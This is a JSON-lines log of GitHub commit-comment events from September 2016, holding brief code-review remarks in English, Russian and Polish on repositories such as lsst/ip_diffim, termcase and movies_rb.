{"id":"4575568517","type":"CommitCommentEvent","actor":{"login":"cdunford"},"repo":{"name":"frostney/rollup-plugin-alias"},"payload":{"comment":{"id":19058081,"position":null,"line":null,"path":null,"commit_id":"52d48673eb5120044bfac4c700d61927a9de9d9b","created_at":"2016-09-16T18:17:01Z","updated_at":"2016-09-16T18:17:01Z","body":"Actually this alone doesn't fix my issue. I have full paths being fed in and they don't match this."}},"created_at":"2016-09-16T18:17:01Z"}
{"id":"4575569845","type":"CommitCommentEvent","actor":{"login":"parejkoj"},"repo":{"name":"lsst/ip_diffim"},"payload":{"comment":{"id":19058084,"position":23,"line":281,"path":"python/lsst/ip/diffim/kernelCandidateQa.py","commit_id":"1afe92ddf95be8c6e5a791234ce71c607f932488","created_at":"2016-09-16T18:17:16Z","updated_at":"2016-09-16T18:17:16Z","body":"Same here: just `for k in metrics:`"}},"created_at":"2016-09-16T18:17:16Z"}
{"id":"4575570252","type":"CommitCommentEvent","actor":{"login":"rclai"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19058086,"position":null,"line":null,"path":null,"commit_id":"899adf5343c2faa43e1f6b4b75c75b3a170112a0","created_at":"2016-09-16T18:17:20Z","updated_at":"2016-09-16T18:17:20Z","body":"Are you guys able to incorporate examples of these flex properties to the UIExplorer?"}},"created_at":"2016-09-16T18:17:20Z"}
{"id":"4575570927","type":"CommitCommentEvent","actor":{"login":"parejkoj"},"repo":{"name":"lsst/ip_diffim"},"payload":{"comment":{"id":19058089,"position":32,"line":291,"path":"python/lsst/ip/diffim/kernelCandidateQa.py","commit_id":"1afe92ddf95be8c6e5a791234ce71c607f932488","created_at":"2016-09-16T18:17:30Z","updated_at":"2016-09-16T18:17:30Z","body":"And again, list() and keys() unneeded here."}},"created_at":"2016-09-16T18:17:30Z"}
{"id":"4575572974","type":"CommitCommentEvent","actor":{"login":"twalpole"},"repo":{"name":"jnicklas/capybara"},"payload":{"comment":{"id":19058095,"position":14,"line":47,"path":"lib/capybara/node/matchers.rb","commit_id":"6d9f80a6ec3d02ea3089afa308a257a04c0642f3","created_at":"2016-09-16T18:17:54Z","updated_at":"2016-09-16T18:17:54Z","body":"thanks"}},"created_at":"2016-09-16T18:17:54Z"}
{"id":"4575579249","type":"CommitCommentEvent","actor":{"login":"rome1983"},"repo":{"name":"liberty-developer/inputstream.mpd"},"payload":{"comment":{"id":19058115,"position":null,"line":null,"path":null,"commit_id":"1e2ffe3ae7e66b2990feec6c8ba37f927eb692ce","created_at":"2016-09-16T18:19:10Z","updated_at":"2016-09-16T18:19:10Z","body":"Damn"}},"created_at":"2016-09-16T18:19:10Z"}
{"id":"4575579814","type":"CommitCommentEvent","actor":{"login":"parejkoj"},"repo":{"name":"lsst/ip_diffim"},"payload":{"comment":{"id":19058119,"position":13,"line":439,"path":"python/lsst/ip/diffim/diffimTools.py","commit_id":"1afe92ddf95be8c6e5a791234ce71c607f932488","created_at":"2016-09-16T18:19:17Z","updated_at":"2016-09-16T18:19:17Z","body":"I'd change to `for candID in bicArray:` and get rid of `candIds` entirely."}},"created_at":"2016-09-16T18:19:17Z"}
{"id":"4575580744","type":"CommitCommentEvent","actor":{"login":"AustinXII"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19058122,"position":145,"line":1609,"path":"commands.js","commit_id":"05ae323fcddf97d865ec5e588d8db26e06b04041","created_at":"2016-09-16T18:19:29Z","updated_at":"2016-09-16T18:19:29Z","body":"No reason to say \"globally locked\" if that is the only possibility imo"}},"created_at":"2016-09-16T18:19:29Z"}
{"id":"4575584533","type":"CommitCommentEvent","actor":{"login":"jedmccaleb"},"repo":{"name":"vogel/stellar-core"},"payload":{"comment":{"id":19058131,"position":null,"line":null,"path":null,"commit_id":"268c4a6e60e5186bbc1c9d895c124f69d779805e","created_at":"2016-09-16T18:20:16Z","updated_at":"2016-09-16T18:20:16Z","body":"r+"}},"created_at":"2016-09-16T18:20:16Z"}
{"id":"4575585603","type":"CommitCommentEvent","actor":{"login":"sonamsingh28"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19058133,"position":1,"line":1,"path":"README.md","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-16T18:20:27Z","updated_at":"2016-09-16T18:20:27Z","body":"Description added."}},"created_at":"2016-09-16T18:20:27Z"}
{"id":"4575586333","type":"CommitCommentEvent","actor":{"login":"sonamsingh28"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19058135,"position":1,"line":1,"path":"config/install/termcase.settings.yml","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-16T18:20:34Z","updated_at":"2016-09-16T18:20:34Z","body":"To define 'variables' and set the default value."}},"created_at":"2016-09-16T18:20:34Z"}
{"id":"4575586835","type":"CommitCommentEvent","actor":{"login":"sonamsingh28"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19058137,"position":1,"line":1,"path":"config/schema/termcase.schema.yml","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-16T18:20:39Z","updated_at":"2016-09-16T18:20:39Z","body":"To define the schema of our variables."}},"created_at":"2016-09-16T18:20:39Z"}
{"id":"4575587154","type":"CommitCommentEvent","actor":{"login":"sonamsingh28"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19058138,"position":2,"line":2,"path":"src/UpdateTerms.php","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-16T18:20:42Z","updated_at":"2016-09-16T18:20:42Z","body":"Added."}},"created_at":"2016-09-16T18:20:42Z"}
{"id":"4575587577","type":"CommitCommentEvent","actor":{"login":"sonamsingh28"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19058140,"position":6,"line":6,"path":"src/UpdateTerms.php","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-16T18:20:46Z","updated_at":"2016-09-16T18:20:46Z","body":"No. Removed"}},"created_at":"2016-09-16T18:20:46Z"}
{"id":"4575588301","type":"CommitCommentEvent","actor":{"login":"sonamsingh28"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19058142,"position":8,"line":8,"path":"src/UpdateTerms.php","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-16T18:20:53Z","updated_at":"2016-09-16T18:20:53Z","body":"removed."}},"created_at":"2016-09-16T18:20:53Z"}
{"id":"4575588382","type":"CommitCommentEvent","actor":{"login":"timj"},"repo":{"name":"lsst/ip_diffim"},"payload":{"comment":{"id":19058143,"position":11,"line":439,"path":"python/lsst/ip/diffim/diffimTools.py","commit_id":"1afe92ddf95be8c6e5a791234ce71c607f932488","created_at":"2016-09-16T18:20:54Z","updated_at":"2016-09-16T18:20:54Z","body":"It doesn't look like `bicArray` is modified inside the loop and `candIds` is not used later in the code so I'm not entirely clear why the loop isn't just `for candId in bicArray:`"}},"created_at":"2016-09-16T18:20:54Z"}
{"id":"4575588551","type":"CommitCommentEvent","actor":{"login":"sonamsingh28"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19058144,"position":10,"line":10,"path":"src/UpdateTerms.php","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-16T18:20:56Z","updated_at":"2016-09-16T18:20:56Z","body":"Added."}},"created_at":"2016-09-16T18:20:56Z"}
{"id":"4575588786","type":"CommitCommentEvent","actor":{"login":"perrygovier"},"repo":{"name":"driftyco/ionic-cli"},"payload":{"comment":{"id":19058146,"position":6,"line":47,"path":"lib/ionic/add.js","commit_id":"fac1c4d7b49e7c102269f3d5e0acef660d762bf5","created_at":"2016-09-16T18:20:59Z","updated_at":"2016-09-16T18:20:59Z","body":"Huh, today I learned something. The dictionary definition of \"depreciate\" is closer to our intent, but it appears \"deprecate\" is more common in computing. \r\nhttp://english.stackexchange.com/questions/45295/why-is-there-confusion-between-depreciated-and-deprecated\r\n\r\nFixed in 5f2be6fc44dd5ef10936099b388264c0d41be5ab"}},"created_at":"2016-09-16T18:20:59Z"}
{"id":"4575589172","type":"CommitCommentEvent","actor":{"login":"sonamsingh28"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19058148,"position":18,"line":18,"path":"src/UpdateTerms.php","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-16T18:21:04Z","updated_at":"2016-09-16T18:21:04Z","body":"Done :)"}},"created_at":"2016-09-16T18:21:04Z"}
{"id":"4575590452","type":"CommitCommentEvent","actor":{"login":"sonamsingh28"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19058151,"position":2,"line":2,"path":"src/VocabularyListBuilder.php","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-16T18:21:18Z","updated_at":"2016-09-16T18:21:18Z","body":"Added."}},"created_at":"2016-09-16T18:21:18Z"}
{"id":"4575591515","type":"CommitCommentEvent","actor":{"login":"sonamsingh28"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19058152,"position":5,"line":5,"path":"termcase.info.yml","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-16T18:21:30Z","updated_at":"2016-09-16T18:21:30Z","body":"Not specified in D7. Should I add some ? If yes then which package ?"}},"created_at":"2016-09-16T18:21:30Z"}
{"id":"4575591997","type":"CommitCommentEvent","actor":{"login":"sonamsingh28"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19058153,"position":12,"line":12,"path":"termcase.module","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-16T18:21:36Z","updated_at":"2016-09-16T18:21:36Z","body":"Done."}},"created_at":"2016-09-16T18:21:36Z"}
{"id":"4575592500","type":"CommitCommentEvent","actor":{"login":"sonamsingh28"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19058155,"position":95,"line":95,"path":"termcase.module","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-16T18:21:42Z","updated_at":"2016-09-16T18:21:42Z","body":"Done."}},"created_at":"2016-09-16T18:21:42Z"}
{"id":"4575592710","type":"CommitCommentEvent","actor":{"login":"sonamsingh28"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19058157,"position":98,"line":98,"path":"termcase.module","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-16T18:21:44Z","updated_at":"2016-09-16T18:21:44Z","body":"Added."}},"created_at":"2016-09-16T18:21:44Z"}
{"id":"4575592733","type":"CommitCommentEvent","actor":{"login":"timj"},"repo":{"name":"lsst/ip_diffim"},"payload":{"comment":{"id":19058158,"position":32,"line":291,"path":"python/lsst/ip/diffim/kernelCandidateQa.py","commit_id":"1afe92ddf95be8c6e5a791234ce71c607f932488","created_at":"2016-09-16T18:21:44Z","updated_at":"2016-09-16T18:21:44Z","body":"```python\r\nif sourceId in wcsresids:\r\n```"}},"created_at":"2016-09-16T18:21:44Z"}
{"id":"4575593106","type":"CommitCommentEvent","actor":{"login":"sonamsingh28"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19058159,"position":106,"line":106,"path":"termcase.module","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-16T18:21:49Z","updated_at":"2016-09-16T18:21:49Z","body":"And should have one space between the text and the slash :)\r\nDone."}},"created_at":"2016-09-16T18:21:49Z"}
{"id":"4575593307","type":"CommitCommentEvent","actor":{"login":"marufkhan01"},"repo":{"name":"marufkhan01/maruf"},"payload":{"comment":{"id":19058161,"position":null,"line":null,"path":null,"commit_id":"35e8cdfc549b82d05381237bc86ab31b13133c64","created_at":"2016-09-16T18:21:52Z","updated_at":"2016-09-16T18:21:52Z","body":"Hello"}},"created_at":"2016-09-16T18:21:52Z"}
{"id":"4575593492","type":"CommitCommentEvent","actor":{"login":"sonamsingh28"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19058162,"position":113,"line":113,"path":"termcase.module","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-16T18:21:54Z","updated_at":"2016-09-16T18:21:54Z","body":"Added."}},"created_at":"2016-09-16T18:21:54Z"}
{"id":"4575594216","type":"CommitCommentEvent","actor":{"login":"sonamsingh28"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19058165,"position":184,"line":184,"path":"termcase.module","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-16T18:22:02Z","updated_at":"2016-09-16T18:22:02Z","body":"Done."}},"created_at":"2016-09-16T18:22:02Z"}
{"id":"4575596229","type":"CommitCommentEvent","actor":{"login":"SuchkovEgor"},"repo":{"name":"Svetomech/IT_lessons"},"payload":{"comment":{"id":19058168,"position":6,"line":6,"path":"Calculator/main.cpp","commit_id":"38c2277583ec3d8ba77c4b65d6342a8055ce6112","created_at":"2016-09-16T18:22:25Z","updated_at":"2016-09-16T18:22:25Z","body":"В том случае, что сказал Вам я - ошибка не возникает, на всякий случай даже перепроверил."}},"created_at":"2016-09-16T18:22:25Z"}
{"id":"4575603759","type":"CommitCommentEvent","actor":{"login":"SuchkovEgor"},"repo":{"name":"Svetomech/IT_lessons"},"payload":{"comment":{"id":19058199,"position":33,"line":16,"path":"Calculator/main.cpp","commit_id":"38c2277583ec3d8ba77c4b65d6342a8055ce6112","created_at":"2016-09-16T18:23:52Z","updated_at":"2016-09-16T18:23:52Z","body":"согласен"}},"created_at":"2016-09-16T18:23:52Z"}
{"id":"4575605562","type":"CommitCommentEvent","actor":{"login":"akien-mga"},"repo":{"name":"godotengine/asset-library"},"payload":{"comment":{"id":19058204,"position":5,"line":514,"path":"src/routes/asset_edit.php","commit_id":"a2cfa501fea9cd1f7dc28ae180e9b7a51006ab9e","created_at":"2016-09-16T18:24:14Z","updated_at":"2016-09-16T18:24:14Z","body":"That would still override existing hashes with an empty one if no hash is given, no?"}},"created_at":"2016-09-16T18:24:14Z"}
{"id":"4575607603","type":"CommitCommentEvent","actor":{"login":"zavlab1"},"repo":{"name":"sergmaks/easylife"},"payload":{"comment":{"id":19058212,"position":null,"line":null,"path":null,"commit_id":"4c2eb2a76d0ea7fd582f548240083e48e9dce43e","created_at":"2016-09-16T18:24:38Z","updated_at":"2016-09-16T18:24:38Z","body":"В Git случайно затесалась папка проекта NetBeans, а также .gitignore."}},"created_at":"2016-09-16T18:24:38Z"}
{"id":"4575610151","type":"CommitCommentEvent","actor":{"login":"latobarita"},"repo":{"name":"stellar/stellar-core"},"payload":{"comment":{"id":19058217,"position":null,"line":null,"path":null,"commit_id":"268c4a6e60e5186bbc1c9d895c124f69d779805e","created_at":"2016-09-16T18:25:09Z","updated_at":"2016-09-16T18:25:09Z","body":"saw approval from jedmccaleb\nat https://github.com/vogel/stellar-core/commit/268c4a6e60e5186bbc1c9d895c124f69d779805e"}},"created_at":"2016-09-16T18:25:09Z"}
{"id":"4575610181","type":"CommitCommentEvent","actor":{"login":"latobarita"},"repo":{"name":"stellar/stellar-core"},"payload":{"comment":{"id":19058218,"position":null,"line":null,"path":null,"commit_id":"268c4a6e60e5186bbc1c9d895c124f69d779805e","created_at":"2016-09-16T18:25:09Z","updated_at":"2016-09-16T18:25:09Z","body":"merging vogel/stellar-core/ntp-check = 268c4a6e into auto"}},"created_at":"2016-09-16T18:25:09Z"}
{"id":"4575610198","type":"CommitCommentEvent","actor":{"login":"latobarita"},"repo":{"name":"stellar/stellar-core"},"payload":{"comment":{"id":19058219,"position":null,"line":null,"path":null,"commit_id":"268c4a6e60e5186bbc1c9d895c124f69d779805e","created_at":"2016-09-16T18:25:10Z","updated_at":"2016-09-16T18:25:10Z","body":"vogel/stellar-core/ntp-check = 268c4a6e merged ok, testing candidate = 21af1648"}},"created_at":"2016-09-16T18:25:10Z"}
{"id":"4575617695","type":"CommitCommentEvent","actor":{"login":"delyew"},"repo":{"name":"delyew/Morse_Code---decoder"},"payload":{"comment":{"id":19058241,"position":null,"line":null,"path":null,"commit_id":"1cb6633c7bb59e119406123af141cf378574642e","created_at":"2016-09-16T18:26:35Z","updated_at":"2016-09-16T18:26:35Z","body":"Decoding user input"}},"created_at":"2016-09-16T18:26:35Z"}
{"id":"4575618789","type":"CommitCommentEvent","actor":{"login":"AbdurRahman11"},"repo":{"name":"AbdurRahman11/Testrepo"},"payload":{"comment":{"id":19058243,"position":null,"line":null,"path":null,"commit_id":"7250c7158ba22b8b79bb4811495052bd3db2058d","created_at":"2016-09-16T18:26:48Z","updated_at":"2016-09-16T18:26:48Z","body":"."}},"created_at":"2016-09-16T18:26:48Z"}
{"id":"4575624996","type":"CommitCommentEvent","actor":{"login":"xantronix"},"repo":{"name":"estrabd/addon_securityadvisor"},"payload":{"comment":{"id":19058258,"position":null,"line":null,"path":null,"commit_id":"6870e52fb4d4fb96a4f9a7cc0ef49e7a89e7144c","created_at":"2016-09-16T18:28:04Z","updated_at":"2016-09-16T18:28:04Z","body":"Looks good to me!"}},"created_at":"2016-09-16T18:28:04Z"}
{"id":"4575625053","type":"CommitCommentEvent","actor":{"login":"SuchkovEgor"},"repo":{"name":"Svetomech/IT_lessons"},"payload":{"comment":{"id":19058259,"position":34,"line":27,"path":"Calculator/main.cpp","commit_id":"38c2277583ec3d8ba77c4b65d6342a8055ce6112","created_at":"2016-09-16T18:28:04Z","updated_at":"2016-09-16T18:28:04Z","body":"дело в том, что конструктор по-умолчанию требуется для использования, например, стандартных шаблонов или \"умных\" указателей. Создать же такой указатель или шаблон с Вашим классом я не смогу (точнее смогу, но поведение методов класса будет не определено). Поэтому в ООП принято при написании класса, даже если в конструкторе ничего делать особенного делать не надо, описывать его пустым."}},"created_at":"2016-09-16T18:28:04Z"}
{"id":"4575625263","type":"CommitCommentEvent","actor":{"login":"Spuds"},"repo":{"name":"emanuele45/Dialogo"},"payload":{"comment":{"id":19058260,"position":7,"line":789,"path":"install/Install_Controller.php","commit_id":"bb16cdc4e74435a5f44aced379d0e169a568edfc","created_at":"2016-09-16T18:28:08Z","updated_at":"2016-09-16T18:28:08Z","body":"Was or is COLLATE set somewhere else? "}},"created_at":"2016-09-16T18:28:08Z"}
{"id":"4575625631","type":"CommitCommentEvent","actor":{"login":"Svetomech"},"repo":{"name":"Svetomech/IT_lessons"},"payload":{"comment":{"id":19058261,"position":6,"line":6,"path":"Calculator/main.cpp","commit_id":"38c2277583ec3d8ba77c4b65d6342a8055ce6112","created_at":"2016-09-16T18:28:12Z","updated_at":"2016-09-16T18:28:12Z","body":"Да? Давайте завтра к вам подойду, может быть я неправильно использую передачу по ссылке."}},"created_at":"2016-09-16T18:28:12Z"}
{"id":"4575627941","type":"CommitCommentEvent","actor":{"login":"delyew"},"repo":{"name":"delyew/Morse_Code---decoder"},"payload":{"comment":{"id":19058264,"position":null,"line":null,"path":null,"commit_id":"1354d055effaee63ac607fdeb43ebd80bc0f24b0","created_at":"2016-09-16T18:28:38Z","updated_at":"2016-09-16T18:28:38Z","body":"MorseCode3 - zmieniony generator losowy\r\nMorseCode4 - Tylko 4 znaki"}},"created_at":"2016-09-16T18:28:38Z"}
{"id":"4575637629","type":"CommitCommentEvent","actor":{"login":"honeymathew"},"repo":{"name":"honeymathew/JavaScriptW3SchoolsTraining"},"payload":{"comment":{"id":19058285,"position":null,"line":null,"path":null,"commit_id":"f4fc85cc7e6b05f08d993378dc7eba05357c0b0f","created_at":"2016-09-16T18:30:27Z","updated_at":"2016-09-16T18:30:27Z","body":"switch example"}},"created_at":"2016-09-16T18:30:27Z"}
{"id":"4575640771","type":"CommitCommentEvent","actor":{"login":"Svetomech"},"repo":{"name":"Svetomech/IT_lessons"},"payload":{"comment":{"id":19058293,"position":33,"line":16,"path":"Calculator/main.cpp","commit_id":"38c2277583ec3d8ba77c4b65d6342a8055ce6112","created_at":"2016-09-16T18:31:00Z","updated_at":"2016-09-16T18:31:00Z","body":"(:"}},"created_at":"2016-09-16T18:31:00Z"}
{"id":"4575642294","type":"CommitCommentEvent","actor":{"login":"Svetomech"},"repo":{"name":"Svetomech/IT_lessons"},"payload":{"comment":{"id":19058296,"position":34,"line":27,"path":"Calculator/main.cpp","commit_id":"38c2277583ec3d8ba77c4b65d6342a8055ce6112","created_at":"2016-09-16T18:31:18Z","updated_at":"2016-09-16T18:31:18Z","body":">>и то, мне кажется, что надо вообще убрать вызов Input() из конструктора и его перегрузок\r\nА вы как считаете?"}},"created_at":"2016-09-16T18:31:18Z"}
{"id":"4575643699","type":"CommitCommentEvent","actor":{"login":"roadscape"},"repo":{"name":"steemit/steemit.com"},"payload":{"comment":{"id":19058302,"position":null,"line":null,"path":null,"commit_id":"39ca60b5fb3c1a4a4d820232419dd9036e95ffb0","created_at":"2016-09-16T18:31:34Z","updated_at":"2016-09-16T18:31:34Z","body":"@mvandeberg will be updating this API soon(ish) to not return top-level posts from the node"}},"created_at":"2016-09-16T18:31:34Z"}
{"id":"4575644064","type":"CommitCommentEvent","actor":{"login":"lefticus"},"repo":{"name":"ChaiScript/ChaiScript"},"payload":{"comment":{"id":19058304,"position":null,"line":null,"path":null,"commit_id":"4e6e63ab5d9537c6c9129a12710fa79145c8684d","created_at":"2016-09-16T18:31:38Z","updated_at":"2016-09-16T18:31:38Z","body":" contrib/codeanalysis/runcppcheck.sh: line 9: ../cppcheck-1.66/cppcheck: No such file or directory\n"}},"created_at":"2016-09-16T18:31:38Z"}
{"id":"4575646308","type":"CommitCommentEvent","actor":{"login":"Spuds"},"repo":{"name":"emanuele45/Dialogo"},"payload":{"comment":{"id":19058312,"position":5,"line":2480,"path":"install/install_1-1.php","commit_id":"f5e15207eb355fccbe6d9fe62222368c73933342","created_at":"2016-09-16T18:32:03Z","updated_at":"2016-09-16T18:32:03Z","body":"I thought you should only use secure cookies when using https ?"}},"created_at":"2016-09-16T18:32:03Z"}
{"id":"4575647883","type":"CommitCommentEvent","actor":{"login":"chelseakomlo"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":19058314,"position":8,"line":15,"path":"crytographic_primitives.md","commit_id":"20d2b855caf71277288f47d2098d84e65e194962","created_at":"2016-09-16T18:32:19Z","updated_at":"2016-09-16T18:32:19Z","body":"Are we using both ed448 and ed25519? I thought we were choosing only one..."}},"created_at":"2016-09-16T18:32:19Z"}
{"id":"4575653970","type":"CommitCommentEvent","actor":{"login":"dezgeg"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19058331,"position":6,"line":532,"path":"nixos/modules/installer/tools/nixos-generate-config.pl","commit_id":"1c9ac8aabc3105b14c762459bd14a5d53f691449","created_at":"2016-09-16T18:33:26Z","updated_at":"2016-09-16T18:33:26Z","body":"The default for this is `/boot/`, why does this need changing?\r\n\r\nAlso this is pretty misleading since only non-EFI systems get this output, the if the script detects a EFI system it suggests systemd-boot instead."}},"created_at":"2016-09-16T18:33:26Z"}
{"id":"4575656458","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"maksemuz/movies_rb"},"payload":{"comment":{"id":19058334,"position":3,"line":3,"path":"MovieCollection_class.rb","commit_id":"410d076ce14821c893eb24c7d5612a7af6137321","created_at":"2016-09-16T18:33:55Z","updated_at":"2016-09-16T18:33:55Z","body":"Так, первым делом несколько важных мелочей по стилю, чтобы потом на этом не останавливаться:\r\n* в руби, мы называем файлы movie_collection.rb — в lowercase и без добавления всяких штук типа _class, _module, _util.\r\n* require всего что в данном файле понадобится лучше писать ДО начала определения классов и прочего.\r\n* между методами оставляем пустую строку."}},"created_at":"2016-09-16T18:33:55Z"}
{"id":"4575656783","type":"CommitCommentEvent","actor":{"login":"piotrek-k"},"repo":{"name":"piotrek-k/generator-dotnetcore-angular2-starterkit"},"payload":{"comment":{"id":19058336,"position":null,"line":null,"path":null,"commit_id":"e9974bbb98a8e69d7ee12d8374a1442b6d63cecf","created_at":"2016-09-16T18:34:00Z","updated_at":"2016-09-16T18:34:00Z","body":"Fixed #2 "}},"created_at":"2016-09-16T18:34:00Z"}
{"id":"4575659940","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"maksemuz/movies_rb"},"payload":{"comment":{"id":19058348,"position":13,"line":13,"path":"MovieCollection_class.rb","commit_id":"410d076ce14821c893eb24c7d5612a7af6137321","created_at":"2016-09-16T18:34:38Z","updated_at":"2016-09-16T18:34:38Z","body":"проверь, что эта штука выдаёт на `filter(genre: 'Drama', year: 2011)`. будешь удивлён ;)"}},"created_at":"2016-09-16T18:34:38Z"}
{"id":"4575666121","type":"CommitCommentEvent","actor":{"login":"Svetomech"},"repo":{"name":"Svetomech/IT_lessons"},"payload":{"comment":{"id":19058368,"position":34,"line":27,"path":"Calculator/main.cpp","commit_id":"38c2277583ec3d8ba77c4b65d6342a8055ce6112","created_at":"2016-09-16T18:35:53Z","updated_at":"2016-09-16T18:35:53Z","body":"Так конструктор по-умолчанию у меня пустой, там только комментарий. Или я не так вас понял?"}},"created_at":"2016-09-16T18:35:53Z"}
{"id":"4575666142","type":"CommitCommentEvent","actor":{"login":"andy5995"},"repo":{"name":"andy5995/rmw"},"payload":{"comment":{"id":19058369,"position":null,"line":null,"path":null,"commit_id":"fa101f312fb32d8328ab939abbc88252a39375d8","created_at":"2016-09-16T18:35:53Z","updated_at":"2016-09-16T18:35:53Z","body":"related to #12 NOT #27"}},"created_at":"2016-09-16T18:35:53Z"}
{"id":"4575676179","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"maksemuz/movies_rb"},"payload":{"comment":{"id":19058404,"position":16,"line":16,"path":"MovieCollection_class.rb","commit_id":"410d076ce14821c893eb24c7d5612a7af6137321","created_at":"2016-09-16T18:37:49Z","updated_at":"2016-09-16T18:37:49Z","body":"А что здесь делает первый each? Для чего он нужен? А так же — что выдаёт этот метод?"}},"created_at":"2016-09-16T18:37:49Z"}
{"id":"4575679561","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"maksemuz/movies_rb"},"payload":{"comment":{"id":19058436,"position":16,"line":16,"path":"MovieCollection_class.rb","commit_id":"410d076ce14821c893eb24c7d5612a7af6137321","created_at":"2016-09-16T18:38:29Z","updated_at":"2016-09-16T18:38:29Z","body":"И, к слову, что будет при попытке `stats(:main_actors)`"}},"created_at":"2016-09-16T18:38:29Z"}
{"id":"4575680431","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"ramohse/dsp"},"payload":{"comment":{"id":19058443,"position":null,"line":null,"path":null,"commit_id":"9bea4a1febbbb427e1bdd3eab15a9a45ae3f69db","created_at":"2016-09-16T18:38:39Z","updated_at":"2016-09-16T18:38:39Z","body":"RE: 05b-python_advanced\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @ramohse \r\n\r\nGood work on the advanced python problems! Some comments:\r\n- In Q1, you list the degrees `MS` and `M.S.` separately, but they are actually the same.\r\n- In Q5, you explicitly close the file `faculty.csv` after a `with open('faculty.csv') as fac_file` construct, but this is not necessary. Same comment for the output file `emails.csv`.\r\n- In Q6-8, this is correct, but could be simplified. For example, to extract last names from the list of names read from the file `faculty.csv`, one could do a simple list comprehension: `last_names = [name.split(' ')[-1] for name in name_list]`.\r\n\r\n👍 "}},"created_at":"2016-09-16T18:38:39Z"}
{"id":"4575685596","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"maksemuz/movies_rb"},"payload":{"comment":{"id":19058483,"position":15,"line":15,"path":"Movie_class.rb","commit_id":"410d076ce14821c893eb24c7d5612a7af6137321","created_at":"2016-09-16T18:39:44Z","updated_at":"2016-09-16T18:39:44Z","body":"> ответить на запрос `has_genre?('Comedy')`\r\n\r\nм?"}},"created_at":"2016-09-16T18:39:44Z"}
{"id":"4575686227","type":"CommitCommentEvent","actor":{"login":"ZombieRoxtar"},"repo":{"name":"ZombieRoxtar/LxssLoader"},"payload":{"comment":{"id":19058484,"position":34,"line":34,"path":"LxssLoader/main.cpp","commit_id":"4cc84b9d2e1e5ce14f1e74b6f0cc467cae185b60","created_at":"2016-09-16T18:39:51Z","updated_at":"2016-09-16T18:39:51Z","body":"`main` can be adapted to take those with no problem, but when you start with `WinMain` then the you will get the final EpicFail (not launching Python). This may be because the current code runs Python in the same window?"}},"created_at":"2016-09-16T18:39:51Z"}
{"id":"4575686443","type":"CommitCommentEvent","actor":{"login":"sheiny"},"repo":{"name":"edubeckha/CG"},"payload":{"comment":{"id":19058486,"position":14,"line":41,"path":"include/window.h","commit_id":"f21f464948b39ecc9fdfbe658d60b67c6fca0945","created_at":"2016-09-16T18:39:54Z","updated_at":"2016-09-16T18:39:54Z","body":"This is right?"}},"created_at":"2016-09-16T18:39:54Z"}
{"id":"4575692895","type":"CommitCommentEvent","actor":{"login":"sheiny"},"repo":{"name":"edubeckha/CG"},"payload":{"comment":{"id":19058509,"position":15,"line":13,"path":"include/point.h","commit_id":"f21f464948b39ecc9fdfbe658d60b67c6fca0945","created_at":"2016-09-16T18:41:13Z","updated_at":"2016-09-16T18:41:13Z","body":"Would be better switch the if to assert no?"}},"created_at":"2016-09-16T18:41:13Z"}
